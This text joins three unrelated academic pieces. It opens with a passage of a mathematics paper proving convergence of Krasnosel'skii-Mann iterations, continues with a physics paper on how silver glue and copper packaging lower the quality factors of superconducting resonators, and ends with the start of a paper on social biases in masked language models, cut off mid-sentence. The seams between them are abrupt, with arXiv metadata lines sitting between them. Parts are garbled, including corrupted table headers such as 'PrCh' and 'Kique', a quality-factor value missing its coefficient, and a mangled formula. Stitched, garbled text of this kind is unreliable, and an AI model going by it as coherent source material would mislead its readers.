\(T_{i},\;i=1,\ldots,m\) and (26) imply that there exists \(\delta_{1}\in(0,\delta_{0})\) such that for each \(x\in B(x_{*},\delta_{1})\cap C\), \[\phi(x)\subset\phi(x_{*}), \tag{27}\] \[\rho(x,T_{i}(x))>\delta_{0},\;i\in I_{2}. \tag{28}\] Theorem 2.1 implies that there exists an integer \(q_{1}\geq 1\) such that for each integer \(t\geq q_{1}\), \[\rho(x_{t},x_{t+1})\leq\delta_{0}/2. \tag{29}\] Assume that \[\epsilon\in(0,\delta_{1}), \tag{30}\] \[t\geq q_{1} \tag{31}\] is an integer and that \[\rho(x_{t},x_{*})\leq\epsilon. \tag{32}\] It follows from (27), (28), (30) and (32) that \[\phi(x_{t})\subset\phi(x_{*}) \tag{33}\] and \[\rho(x_{t},T_{i}(x_{t}))>\delta_{0},\;i\in I_{2}. \tag{34}\] In view of (33), there exists \[s\in\phi(x_{*})\] such that \[x_{t+1}=T_{s}(x_{t}). \tag{35}\] . By (29), (31) and (35), \[\rho(x_{t},T_{s}(x_{t}))=\rho(x_{t},x_{t+1})\leq\delta_{0}/2. \tag{36}\] It follows from (25), (34) and (36) that \[s\in I_{1},\;T_{s}(x_{*})=x_{*}.\] Combined with assumption (A2) and equations (32) and (35) this implies that \[\rho(x_{t+1},x_{*})=\rho(T_{s}(x_{t}),x_{*})\leq\rho(x_{t},x_{*})\leq\epsilon.\] Thus we have shown that if \(t\geq q_{1}\) is an integer and (32) holds, then (33) is true and if \(s\in\phi(x_{*})\) and (35) holds, then \(s\in I_{1}\) and \(\rho(x_{t+1},x_{*})\leq\epsilon\). By induction and (21), we obtain that \[\rho(x_{i},x_{*})\leq\epsilon\] for all sufficiently large natural numbers \(i\). Since \(\epsilon\) i an arbitrary element of \((0,\delta_{1})\) we conclude that \[\lim_{t\rightarrow\infty}x_{t}=x_{*}\] and Theorem 2.2 is proved. ## 6 Kraasnosel'ski-Mann iterations Assume that \((X,\|\cdot\|)\) is a normed space and that \(\rho(x,y)=\|x-y\|,\;x,y\in X\). We use the notation, definitions and assumptions introduced in Section 2. In particular, we assume that assumptions (A1)-(A3) hold. Suppose that the set \(C\) is convex and denote by \(Id:X\to X\) the identity operator: \(Id(x)=x\), \(x\in X\). Let \[\kappa\in(0,2^{-1}).\] We consider Kraasnosel'ski-Mann iteration associated with our set-valued mapping \(T\) and obtain the global convergence result (see Theorem 6.2 below) which generalizes the local convergence result of [6] for iterates starting from a point belonging to a neighborhood of a strong fixed point belonging to the set \(\bar{F}(T)\). The following result is proved in Section 7. Theorem 6.1: _Assume that \(M>0\), \(\epsilon\in(0,1)\) and that_ \[\bar{F}(T)\cap B(\theta,M)\neq\emptyset \tag{37}\] _Then there exists an integer \(Q\geq 1\) such that for each_ \[\{\lambda_{t}\}_{t=0}^{\infty}\subset(\kappa,1-\kappa) \tag{38}\] _and each sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) which satisfies_ \[\|x_{0}-\theta\|\leq M\] _and_ \[x_{t+1}\in(1-\lambda_{t})x_{t}+\lambda_{t}T(x_{t})\text{ for each integer }t\geq 0 \tag{39}\] the inequality_ \[\|x_{t}-\theta\|\leq 3M\] _holds for all integers \(t\geq 0\),_ \[\text{Card}(\{t\in\{0,1,\dots,\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq Q\] _and \(\lim_{t\to\infty}\|x_{t}-x_{t+1}\|=0\)._ The following result is proved in Section 8. **Theorem 6.2**: _Assume that_ \[\{\lambda_{t}\}_{t=0}^{\infty}\subset(\kappa,1-\kappa)\] _and that a sequence \(\{x_{t}\}_{t=0}^{\infty}\subset C\) satisfies (39). Then there exist_ \[x_{*}=\lim_{t\to\infty}x_{t}\] _and a natural number \(t_{0}\) such that for each integer \(t\geq t_{0}\)_ \[\phi(x_{t})\subset\phi(x_{*})\] _and if an integer \(i\in\phi(x_{t})\) satisfies_ \[x_{t+1}=\lambda_{t}T_{i}(x_{t})+(1-\lambda)x_{t},\] _then_ \[T_{i}(x_{*})=x_{*}.\] ## 7 Proof of Theorem 6.1 By (37), there exists \[z_{*}\in B(\theta,M)\cap\bar{F}(T). \tag{40}\] Lemma 3.1 implies that there exists \(\delta\in(0,\epsilon)\) such that the following property holds: (c) for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(z_{*},2M)\) satisfying \[\rho(x,T_{s}(x))>\epsilon\] we have \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta.\] Choose a natural number \[Q\geq 2M\delta^{-1}\kappa^{-1}. \tag{41}\] Assume that (38) holds and that a sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) satisfies (39) and \[\|x_{0}-\theta\|\leq M. \tag{42}\] Let \(t\geq 0\) be an integer. By (2) and (39), there exists \(s\in\{1,\ldots,m\}\) such that \[x_{t+1}=\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}. \tag{43}\] Assumption (A2) and equations (3), (40) and (43) imply that \[\|x_{t+1}-z_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-z_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-z_{*}\|+(1-\lambda_{t})\|x_{t}-z_{*}\|\leq\|z_{* }-x_{t}\|. \tag{44}\] Since \(t\) is an arbitrary nonnegative integer equations (40), (42) and (44) imply that for each integer \(i\geq 0\), \[\|z_{*}-x_{i}\|\leq\|z_{*}-x_{0}\|\leq 2M\] and \[\|x_{i}-\theta\|\leq 3M.\] Assume that \[\|x_{t+1}-x_{t}\|>\epsilon. \tag{45}\] It follows from (38), (43) and (45) that \[\epsilon<\|x_{t+1}-x_{t}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-x_{ t}\|=\lambda_{t}\|T_{s}(x_{t})-x_{t}\|\] and \[\|T_{s}(x_{t})-x_{t}\|\geq\epsilon\lambda_{t}^{-1}\geq\epsilon(1-\kappa)^{-1}. \tag{46}\] Property (c) and equation (46) imply that \[\|z_{*}-T_{s}(x_{t})\|\leq\|z_{*}-x_{t}\|-\delta. \tag{47}\] By (38), (43) and (47), \[\|x_{t+1}-z_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-z_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-z_{*}\|+(1-\lambda_{t})\|x_{t}-z_{*}\|\] \[\leq\lambda_{t}(\|x_{t}-z_{*}\|-\delta)+(1-\lambda_{t})\|x_{t}-z_{*}\|\] \[\leq\|x_{t}-z_{*}\|-\lambda_{t}\delta\leq\|x_{t}-z_{*}\|-\delta\kappa. \tag{48}\] Thus we have shown that the following property holds: (d) if an integer \(t\geq 0\) satisfies (45), then \[\|z_{*}-x_{t+1}\|\leq\|z_{*}-x_{t}\|-\delta\kappa.\] Assume that \(n\geq 1\) is an integer. Property (d) and equations (40), (42) and (44) imply that \[2M\geq\|z_{*}-x_{0}\|\geq\|z_{*}-x_{0}\|-\|z_{*}-x_{n+1}\|\] \[=\sum_{t=0}^{n}(\|z_{*}-x_{t}\|-\|z_{*}-x_{t+1}\|)\] \[\geq\sum\{\|z_{*}-x_{t}\|-\|z_{*}-x_{t+1}\|:\;t\in\{0,\ldots,n\},\;\|x_{t}-x_{t +1}\|>\epsilon\}\] \[\geq\delta\kappa\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\] and in view of (41), \[\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq 2M(\delta \kappa)^{-1}\leq Q.\] Since \(n\) is an arbitrary natural number we conclude that \[\mbox{Card}(\{t\in\{0,1,\ldots\}:\;\|x_{t}-x_{t+1}\|>\epsilon\})\leq Q.\] Since \(\epsilon\) is any element of \((0,1)\) we obtain that \[\lim_{t\rightarrow\infty}\|x_{t}-x_{t+1}\|=0.\] Theorem 6.1 is proved. ## 8 Proof of Theorem 6.2 In view of Theorem 6.1, the sequence \(\{x_{t}\}_{t=0}^{\infty}\) is bounded. In view of (A1), it has a limit point \(x_{*}\in C\) and a subsequence \(\{x_{t_{k}}\}_{k=0}^{\infty}\) such that \[x_{*}=\lim_{k\to\infty}x_{t_{k}}. \tag{49}\] In view of (A3) and equations (38), (39) and (49), extracting a subsequence and re-indexing, we may assume without loss of generality that \[\phi(x_{t_{k}})\subset\phi(x_{*}),\;k=1,2,\ldots \tag{50}\] and that there exists \[\widehat{p}\in\phi(x_{*})\] such that \[x_{t_{k}+1}=\lambda_{t_{k}}T_{\widehat{p}}(x_{t_{k}})+(1-\lambda_{t_{k}})x_{t _{k}},\;k=1,2,\ldots \tag{51}\] and that there exists \[\lambda_{*}=\lim_{k\to\infty}\lambda_{t_{k}}\in[\kappa,1-\kappa]. \tag{52}\] It follows from Theorem 6.1, the continuity of \(T_{\widehat{p}}\) and equations (49), (51) and (52) that \[\lambda_{*}T_{\widehat{p}}(x_{*})+(1-\lambda_{*})x_{*}\] \[=\lim_{k\to\infty}(\lambda_{t_{k}}T_{\widehat{p}}(x_{t_{k}})+(1-\lambda_{t_{k }})x_{t_{k}})\] \[=\lim_{k\to\infty}x_{t_{k}+1}=\lim_{k\to\infty}x_{t_{k}}=x_{*}. \tag{53}\] Set \[I_{1}=\{i\in\phi(x_{*}):\;T_{i}(x_{*})=x_{*}\},\;I_{2}=\phi(x_{*})\setminus I_ {1}. \tag{54}\] In view of (53) and (54), \[\widehat{p}\in I_{1}.\] Fix \(\delta_{0}\in(0,1)\) such that \[\|x_{*}-T_{i}(x_{*})\|>2\delta_{0},\;i\in I_{2}. \tag{55}\] Assumption (A3), the continuity of \(T_{i},\;i=1,\ldots,m\) and (55) imply that there exists \(\delta_{1}\in(0,\delta_{0})\) such that for each \(x\in B(x_{*},\delta_{1})\cap C\), \[\phi(x)\subset\phi(x_{*}), \tag{56}\] \[\|x-T_{i}(x)\|>\delta_{0},\;i\in I_{2}. \tag{57}\] Theorem 6.1 implies that there exists an integer \(q_{1}\geq 1\) such that for each integer \(t\geq q_{1}\), \[\|x_{t}-x_{t+1}\|\leq\kappa\delta_{0}/2. \tag{58}\] Assume that \[\epsilon\in(0,\delta_{1}), \tag{59}\] \[t\geq q_{1} \tag{60}\] is an integer and that \[\|x_{t}-x_{*}\|\leq\epsilon. \tag{61}\] It follows from (56), (57), (59) and (61) that \[\phi(x_{t})\subset\phi(x_{*}) \tag{62}\] and \[\|x_{t}-T_{i}(x_{t})\|>\delta_{0},\;i\in I_{2}. \tag{63}\] In view of (39), there exists \[s\in\phi(x_{t})\subset\phi(x_{*})\] such that \[x_{t+1}=\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}. \tag{64}\] . By (38), (58) and (64), \[\kappa\delta_{0}/2\geq\|x_{t+1}-x_{t}\|=\lambda_{t}\|T_{s}(x_{t})-x_{t}\|\] and \[\|x_{t}-T_{s}(x_{t})\|\leq\kappa\delta_{0}(2\lambda_{t})^{-1}\leq\delta_{0}/2. \tag{65}\] It follows from (54), (56), (57), (59), (61) and (65) that \[s\in I_{1},\;T_{s}(x_{*})=x_{*}.\] Combined with assumption (A2) and equations (39), (61) and (64) this implies that \[\|x_{t+1}-x_{*}\|=\|\lambda_{t}T_{s}(x_{t})+(1-\lambda_{t})x_{t}-x_{*}\|\] \[\leq\lambda_{t}\|T_{s}(x_{t})-x_{*}\|+(1-\lambda_{t})\|x_{t}-x_{*}\|\] \[\leq\|x_{t}-x_{*}\|\leq\epsilon.\] Thus we have shown that if \(t\geq q_{1}\) is an integer and (61) holds, then \(\|x_{t+1}-x_{*}\|\leq\epsilon\). By induction and (49), we obtain that \[\|x_{i}-x_{*}\|\leq\epsilon\] for all sufficiently large natural numbers \(i\). Since \(\epsilon\) i an arbitrary element of \((0,\delta_{1})\) we conclude that \[\lim_{t\rightarrow\infty}x_{t}=x_{*}\] and Theorem 6.2 is proved.
2304.08629
Identification and Mitigation of Conducting Package Losses for Quantum Superconducting Devices
Low-loss superconducting rf devices are required when used for quantum computation. Here, we present a series of measurements and simulations showing that conducting losses in the packaging of our superconducting resonator devices affect the maximum achievable internal quality factors (Qi) for a series of thin-film Al quarter-wave resonators with fundamental resonant frequencies varying between 4.9 and 5.8 GHz. By utilizing resonators with different widths and gaps, different volumes of the stored electromagnetic energy were sampled thus affecting Qi. When the backside of the sapphire substrate of the resonator device is adhered to a Cu package with a conducting silver glue, a monotonic decrease in the maximum achievable Qi is found as the electromagnetic sampling volume is increased. This is a result of induced currents in large surface resistance regions and dissipation underneath the substrate. By placing a hole underneath the substrate and using superconducting material for the package, we decrease the ohmic losses and increase the maximum Qi for the larger size resonators.
Yizhou Huang, Yi-Hsiang Huang, Haozhi Wang, Zach Steffen, Jonathan Cripe, F. C. Wellstood, B. S. Palmer
2023-04-17T21:51:47Z
http://arxiv.org/abs/2304.08629v2
# Identification and Mitigation of Conducting Package Losses for Quantum Superconducting Devices ###### Abstract Low-loss superconducting microwave devices are required for quantum computation. Here, we present a series of measurements and simulations showing that conducting losses in the packaging of our superconducting resonator devices affect the maximum achievable internal quality factors (\(Q_{i}\)) for a series of thin-film Al quarter-wave resonators with fundamental resonant frequencies varying between 4.9 and 5.8 GHz. By utilizing resonators with different widths and gaps, we sampled different electromagnetic energy volumes for the resonators affecting \(Q_{i}\). When the backside of the sapphire substrate of the resonator device is adhered to a Cu package with a conducting silver glue, a monotonic decrease in the maximum achievable \(Q_{i}\) is found as the electromagnetic sampling volume is increased. This is a result of induced currents in large surface resistance regions and dissipation underneath the substrate. By placing a hole underneath the substrate and using superconducting material for the package, we decrease the ohmic losses and increase the maximum \(Q_{i}\) for the larger size resonators. + Footnote †: preprint: ## I Introduction The ability to produce superconducting devices with low microwave loss and small phase noise is desired for the astronomical detector community and the quantum information community.[1; 2] At the chip level, this requires the use of low-loss materials, clean fabrication processes, and good microwave hygiene.[3; 4; 5] The packaging for the quantum chip should provide good impedance matching over a large bandwidth, a small amount of cross-talk between different signal lines, and have good shielding to reduce radiated losses and prevent stray THz or IR black-body radiation from leaking into the package.[6; 7] In this article, we measure limitations on the maximum achievable internal quality factors, \(Q_{i}\), of a series of superconducting microwave resonators. The source of this loss is from dissipation in normal metal conductors used in the package of the resonator chip. The energy stored in the resonator produces an rf magnetic field \(H\) resulting in the production of shielding eddy currents in nearby conductors when \(H\) impinges upon them. A noticeable amount of dissipation occurs when these shielding currents are produced in conductors with a finite surface resistance. This loss mechanism was initially identified when measuring five resonators on a single chip and noticing a systematic decrease in their quality factors with an increase in the widths and gaps of the resonators. To model this finding, we performed finite-element simulations to estimate the magnitude of dissipation in each conductor used in the package. A conducting adhesive, used to adhere and thermalize the chip to the package, was identified to be the most significant source of loss. By implementing a few changes to the packaging, we reduce this loss and demonstrate over an order of magnitude improvement in the maximum \(Q_{i}\) of the resonators. ## II Device and Results The thin film Al chip that we measured consists of five multiplexed quarter-wave coplanar waveguide (CPW) resonators coupled to a common coplanar waveguide transmission feedline.[8] The resonators had different fundamental resonant frequencies \(f_{\circ}\), CPW widths \(w\) and gaps \(g\) ranging from \(f_{\circ}=4.9\) GHz, \(w=3\)\(\mu\)m and \(g=1.5\)\(\mu\)m for R1 up to \(f_{\circ}=5.8\) GHz, \(w=22\)\(\mu\)m and \(g=11\)\(\mu\)m for R5 (see supplemental material for more details). The same chip was sequentially packaged in four different ways and measured. To efficiently conduct heat from the chip, a silver impregnated conducting adhesive,[9] diluted with toluene, was used to attach the chip in each package. For the first measurement, the backside of the chip was glued to an OFHC Cu package (denoted Cu\(\blacksquare\)). A two layer Cu printed circuit board (PCB) was used to interface rf signals from a non-magnetic SMA connector to the resonator chip (see Fig.1 (a) for a CAD rendering). To measure the low-temperature loss of the resonators, the device was bolted to the mixing chamber stage of a Leiden cryogen-free dilution refrigerator, connected to input and output microwave cables, encased in two open ended Amumated 4K cylinders, and cooled to a temperature less than 20 mK. (See Ref.[10] for details of the set-up.) A vector network analyzer was used to measure the in-phase and out-of-phase ratio of the transmitted voltage to input voltage at 1601 different discrete frequencies (\(S_{21}(f)\)) spanning the resonance and at different input drive voltages. Each \(S_{21}(f)\) scan was repeated multiple times, from which the mean \(\bar{S}_{21}(f)\) and the standard deviation \(\sigma_{S_{21}}(f)\) at each frequency were calculated for both quadratures. Both quadratures of the mean \(\bar{S}_{21}(f)\) were simultaneously fitted, weighted by \(1/\sigma_{S_{21}}(f)\), using the diameter-correction method [11] to extract 5 fitting parameters including \(Q_{i}\). Fig. 2 shows a log-log plot of the fitted \(Q_{i}\) versus stored average photon number from the first measurement of the resonators in Cu\(\blacksquare\) package. For R1, a weak increase in \(Q_{i}\) with increasing power was observed with a maximum \(Q_{i,m}\simeq 2\times 10^{6}\). As \(w\) and \(g\) of the resonators increase, the observed power dependence decreases and \(Q_{i,m}\) decreases to \(Q_{i,m}=10^{5}\) for resonator R5. The focus of this paper is to determine the physical mechanism responsible for the limitations on \(Q_{i,m}\). These limitations are not consistent with losses at the interfaces near the resonator since \(Q_{i,m}\) decreases with an increase in \(g\) and \(w\). [12] Instead, loss farther from the resonator was thought to be the source. Since normal metal conductors were underneath and surrounded the resonator chip, our conjecture was that Ohmic dissipation from these normal metal components limited \(Q_{i,m}\). To examine this hypothesis, we modified the package and remeasured the same resonator chip. First, a 4.2 mm \(\times\) 4.2 mm wide hole that was 2.5 mm deep was milled out of the bottom of the Cu package where the chip resided. To adhere the device, glue was added to two corners of the chip and along the sides (see purple regions in Fig. 1(a)). With these modifications (denoted Cu\(\square\)), all of the \(Q_{i,m}\)'s improved, especially for R5 which demonstrated over a factor of 20 improvement (see Fig. 3). In addition, there was no longer a strong correlation between \(Q_{i,m}\) to \(w\) and \(g\) of the resonators. To determine whether the \(Q_{i,m}\)'s could be improved further, two packages with overall the same geometry were manufactured from aluminum 6063 and used to measure the same resonator chip. One of them had no hole (Al\(\blacksquare\)) and one had a hole (Al\(\square\)). Similar to the Cu\(\square\) case, a smaller amount of glue was applied underneath or on the perimeter of the chip for both Al packages. Also, the Cu PCB, which was glued with a silver epoxy [13] to the Al package, was trimmed and cut into two pieces so that it was only within close proximity to the side of the chip with the input and output SMA launchers (see Fig.1(b) and supplemental material). While the \(Q_{i,m}\)'s for the Al\(\blacksquare\) showed an overall increase over the \(Q_{i,m}\)'s measured in Cu\(\blacksquare\), an increase in the loss with resonator size from R2 to R5 was still observed. The data in the Al\(\square\) package had similar \(Q_{i,m}\)'s as measured for Cu\(\square\). Next, we discuss a model and the use of microwave finite element simulations to identify the observed sources of loss in our package. Figure 1: CAD rendering of resonator chip and surrounding PCB (lid and sidewall not shown). (a) Plan view of device in Cu\(\square\) package, showing substrate (cyan), resonators (red), center transmission line (white), surrounding PCB (orange), and glue above (dark purple) and below (light purple) the substrate. A series of connections were used to represent the wire-bond connections from the chip to the surrounding PCB. The size and approximate location of the optional hole is denoted with the dashed contour. (b) Trimetric view of chip and Al\(\square\) package. Figure 3: Bar chart of measured maximum \(Q_{i,m}\) on a log scale for each resonator in their corresponding Cu or Al package, without a hole (\(\blacksquare\)) and with a 4.2 x 4.2 mm\({}^{2}\) hole (\(\square\)) underneath the 5 x 5 mm\({}^{2}\) chip. Figure 2: Log-log plot of the fitted resonator internal quality factors versus stored photon number for Cu\(\blacksquare\) package. As the width and gap of the resonator increases from R1 to R5, the measured power dependence is smaller and the maximum \(Q_{i,m}\) decreases. The dashed line on top is a weak \(\propto n^{0.1}\) power law as a guide. The semi-transparent arrows give a bound of the estimated \(Q_{i}\) for the resonators \(R_{2}\) to \(R_{5}\), assuming the surface underneath the substrate was filled with Ag impregnated adhesive as the lower bound and OFHC Cu as the upper bound (see text). ## III Model & Simulations Dissipation from induced eddy currents in the surrounding normal metal associated with the packaging was hypothesized as the source limiting \(Q_{i,m}\). Neglecting the anomalous skin effect, ac shielding currents in a normal metal with resistivity \(\rho\) decay on a length scale given by the skin depth \(\delta=\sqrt{\frac{2\rho}{2\pi/\mu_{o}}}\), this results in an effective surface resistance \(R_{S}=\rho/\delta\).[14; 15] The power dissipated in \(R_{S}\) also produces a limitation in the internal quality factor given by[14] \[Q_{i,R_{S}}^{-1}=\frac{R_{S}}{2\pi f_{c}\mu_{o}}\gamma=\frac{R_{S}}{2\pi f_{c} \mu_{o}}\frac{\int\int_{S}|H|^{2}dS}{\int\int\int_{V}|H|^{2}dV}. \tag{1}\] Here, the ratio of the two integrals, which we define as \(\gamma\), corresponds to a geometric factor of the ratio of the magnetic field energy at the surface of \(R_{S}\) to the total magnetic field energy. For scaling purposes, \(f_{c}=5.6\) GHz for R4 and the ratio \(R_{S}/(2\pi f_{c}\mu_{o})=(3.4\times 10^{-3}\sqrt{\rho})\ [{\rm m}/\Omega]^{1/2}\). There are three normal conductors of concern present in our packaging. First, the Ag impregnated glue was measured to have a relatively large dc resistivity of \(\rho_{\rm glue}=630\ \mu\Omega\cdot\)cm at \(T=77\) K. For the Ag glue, the ratio \(R_{S,glue}/(\omega_{\rm e}\mu_{o})=8.5\times 10^{-6}\) m at 5.6 GHz, implying \(\gamma_{glue}<(1/8.5)\) m\({}^{-1}\) to achieve \(Q_{i}>10^{6}\). The other normal conductor of concern was the Cu used in the two Cu packages. From quality factor measurements of a 3D OFHC Cu cavity at \(T=3\) K, the resistivity of the Cu is estimated to be \(\rho_{\rm Cu}\simeq 0.6\ \mu\Omega\cdot\)cm. The third and final conductor was the PCB Cu. By manufacturing a bandpass microwave CPW resonator from a similar PCB and measuring \(Q\) at \(T=3\) K, a dc resistivity \(\rho_{\rm PCB}\simeq 2\ \mu\Omega\cdot\)cm was estimated.[16] These three values of \(\rho\) are used to estimate the loss. To calculate the geometric factor \(\gamma\) at the surface of each conductor of concern, the \(H\) field for each resonator in the different package geometries was simulated using Ansys's high frequency simulation software (HFSS). Each conductor in the simulation was assumed to be a perfect electric conductor to reduce simulation resources. To simulate the \(H\) field associated with the stored energy of the resonator, and not with the coupling to the CPW transmission line, we implemented two effects in the simulation. First, the connections between the signal trace of the resonator chip to the PCB were removed. This prevented radiation from leaking to the ports where the SMA connectors were located and also avoiding a standing wave near a resonant frequency. Second, the open end of the quarter-wave resonator was shunted with an excitation lumped port with a matched impedance to the resonator waveguide, which is 50 \(\Omega\). The resonator was then excited at \(f_{\circ}\), which was determined by satisfying \({\rm Im}\left[(V_{11}(f_{\circ})]=0\right.\) where \(Y_{11}\) is the self-admittance of the lumped port. We simulated each resonator in the four different packages and calculated \(\gamma\) for each conductor of concern. Table 1 presents the calculated geometric factors \(\gamma\) associated with the different normal conducting regions for each resonator in the different packages. These regions were the OFHC Cu material ("Base"), the Ag impregnated glue, and the PCB Cu used to feed signals to the resonator device. Since glue was pervasive underneath the entire substrate of the chip in Cu\(\blacksquare\) package, we have combined base and glue together for that measurement. For other packages, pictures of the device were used to identify the placement of the glue and hence the regions to calculate \(\gamma\) (see purple regions in Fig. 1). Using the corresponding geometric values from Table 1 and the measured resistivity values, losses due to the glue, Cu package, and PCB were calculated using Eq. 1 and compared against measured values in the bar chart of Fig.4. Note that for Cu\(\blacksquare\) package, a 70% fill rate for the glue was assumed. For R5, as example, in Cu\(\blacksquare\), \(0.7\times\gamma_{glue}=1.2\) m\({}^{-1}\) implying \(Q_{i,R_{S}}\simeq\times 10^{5}\), a value comparable to the observed measured loss. Loss from the glue explains the \(w\) and \(g\) trend observed in the Cu\(\blacksquare\) package and the apparent random high loss measured with R4 and R5 in the other three packages. We note that Goetz _et al._ reached a similar conclusion for their source of loss being associated with a conducting adhesive.[17] Nonetheless, several benefits of the hole underneath the chip are noted: 1. The induced currents in the PCB are reduced due to the stored \(H\) field residing in vacuum underneath the device \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|c|c|c|} \hline R\# & \multicolumn{2}{|c|}{Cu\(\blacksquare\)} & \multicolumn{2}{|c|}{Cu\(\square\)} & \multicolumn{2}{|c|}{A\(\blacksquare\)} & \multicolumn{2}{|c|}{A\(\square\)} \\ \cline{2-10} & \multicolumn{2}{|c|}{Phase/Glue} & \multicolumn{2}{|c|}{PrCh} & \multicolumn{2}{|c|}{Phase} & \multicolumn{2}{|c|}{PrCh} & \multicolumn{2}{|c|}{PlCu} & \multicolumn{2}{|c|}{PlCu} & \multicolumn{2}{|c|}{Kique} & \multicolumn{2}{|c|}{PrCh} & \multicolumn{2}{|c|}{Kique} \\ \hline R1 & 0.02 & 0.01 & - & - & - & - & - & - & - & - \\ \hline R2 & 0.12 & 0.06 & 0.01 & - & - & - & 0.01 & - & - & - \\ \hline R3 & 0.35 & 0.16 & 0.02 & 0.02 & - & 0.06 & 0.02 & 0.01 & - \\ \hline R4 & 0.95 & 0.42 & 0.06 & 0.04 & 0.12 & 0.24 & 0.07 & 0.03 & 0.01 \\ \hline R5 & 1.6 & 0.89 & 0.16 & 0.13 & 0.04 & 0.77 & 0.22 & 0.12 & 0.03 \\ \hline \end{tabular} \end{table} Table 1: HFSS simulated magnetic field geometric factors \(\gamma\) in units of m\({}^{-1}\), for the different size resonators and in the various packages. Three surfaces were considered for the geometric factor calculations: the Cu packaging “Base”, the “PCB” Cu, and regions where “Glue” was used to adhere the device. \(\gamma\) factors smaller than 0.005 m\({}^{-1}\) are left blank. Figure 4: Comparison of estimated and measured resonator loss \(1/Q_{i,m}\) for each resonator and in each package. Note the scale of the y-axis changes at \(1\times 10^{-6}\). Identification and Mitigation of Conducting Package Losses for Al\(\blacksquare\) and Al\(\square\)). 2. The amount of rf current flowing on and off the chip through the wire bonds is decreased. 3. The fundamental resonant frequency of spurious package modes, which can couple to the quantum device and result in decoherence, increases due to the lower dielectric constant of the vacuum in the hole. Simulations show the frequency of the first package mode increases from approximately 11 GHz up to 22 GHz. Finally, a slight increase in \(Q_{i,m}\) with an increase in resonator width and gap for R1 to R3 in Al\(\square\) was observed (see Fig. 4). To account for this small trend, a 0.35 nm thick surface interface dielectric loss was added using \(\tan\delta\sim 10^{-3}\) and COMSOL was used to simulate this "surface loss" (see supplementary materials for details).[12] ## IV Conclusion In this work, we found that conducting losses associated with resistant materials used in the packaging resulted in an increase in the internal losses of superconducting microwave resonators. To explore the source of these losses, a resonator chip was measured in four different packages and finite-element microwave simulations were performed. Our measurements and simulations show that resonators with wider center line traces and gaps induced a larger amount of eddy shielding currents in conducting material directly below the substrate of the chip and that this could limit the resonator's \(Q_{i}\) when that conductor had a large resistivity. A predominant source of our loss was associated with the silver impregnated glue that was used as the adhesive between the substrate and the package base. This loss and loss from a normal metal conducting PCB surrounding the device can be mitigated by creating a hole in the package directly below the chip and using material with a smaller surface resistance. While the effect of different packages on the quality factors of superconducting coplaner waveguide resonators was studied in this paper, these results can be extended to superconducting transmon qubits. In particular, an x-mon qubit[18] with \(w=g=30\)\(\mu\)m and a fundamental resonance at \(f_{\circ}=6\) GHz was simulated. The center of the x-mon was placed 1.25 mm away from both edges of the substrate in Cu\(\blacksquare\), and in the absence of the conducting glue a \(T_{1}\sim 3\)\(\mu\)s limited by the surface resistance of the Cu backing was found. Switching to Al\(\square\) would increase \(T_{1}\sim 80\)\(\mu\)s limited by the Cu in the PCB. Furthermore, to downconvert hot phonons and reduce quasiparticle tunneling charge parity rates, a few groups have electroplated Cu on the backside of the substrate in a grid of squares[19]. For a \(0.5\times 0.5\) mm\({}^{2}\) Cu grid with a 50% fill rate, enough induced currents are produced such that \(T_{1}\simeq 18\)\(\mu\)s for the x-mon considered here. Based on the results of this paper, a few final recommendations are made: 1. The use of normal conducting glues is not recommended; better choices are the use of dielectric glues or no glue.[20] 2. Increasing the separation between the resonator or qubit device and normal conducting material with the use of holes underneath the substrate or the use of thicker substrates significantly reduces currents underneath as well as on and off the device through the wirebonds. 3. The use of superconductors with a smaller surface resistance in the package and PCB could be essential to decrease the loss in very low loss future qubits or resonators. 4. Knowledge of the microwave surface resistance of various materials used in the package is valuable information. 5. Simulations similar to the ones performed here to estimate \(\gamma\) are a valuable tool to utilize. With some of these recommendations, the lifetimes for our planar transmon qubits have risen from a few microseconds to \(T_{1}\sim 100\)\(\mu\)s. ###### Acknowledgements. The authors acknowledge useful suggestions and conversations with Christopher Lobb. The authors thank Danielle Braje and MIT Lincoln Laboratory for the design of the resonator chip and Ashish Alexander and Chris Richardson for the use of their PCB. ## Data Availability Statement The data that support the findings of this study are available from the corresponding author upon reasonable request.
2310.12936
A Predictive Factor Analysis of Social Biases and Task-Performance in Pretrained Masked Language Models
Various types of social biases have been reported with pretrained Masked Language Models (MLMs) in prior work. However, multiple underlying factors are associated with an MLM such as its model size, size of the training data, training objectives, the domain from which pretraining data is sampled, tokenization, and languages present in the pretrained corpora, to name a few. It remains unclear as to which of those factors influence social biases that are learned by MLMs. To study the relationship between model factors and the social biases learned by an MLM, as well as the downstream task performance of the model, we conduct a comprehensive study over 39 pretrained MLMs covering different model sizes, training objectives, tokenization methods, training data domains and languages. Our results shed light on important factors often neglected in prior literature, such as tokenization or model objectives.
Yi Zhou, Jose Camacho-Collados, Danushka Bollegala
2023-10-19T17:33:33Z
http://arxiv.org/abs/2310.12936v2
A Predictive Factor Analysis of Social Biases and Task-Performance in Pretrained Masked Language Models ###### Abstract Various types of social biases have been reported with pretrained Masked Language Models (MLMs) in prior work. However, multiple underlying factors are associated with an MLM such as its model size, size of the training data, training objectives, the domain from which pretraining data is sampled, tokenization, and languages present in the pretrained corpora, to name a few. It remains unclear as to which of those factors influence social biases that are learned by MLMs. To study the relationship between model factors and the social biases learned by an MLM, as well as the downstream task performance of the model, we conduct a comprehensive study over 39 pretrained MLMs covering different model sizes, training objectives, tokenization methods, training data domains and languages. Our results shed light on important factors often neglected in prior literature, such as tokenization or model objectives. ## 1 Introduction Masked Language Models (MLMs) have achieved promising performance in many NLP tasks Devlin et al. (2019); Liu et 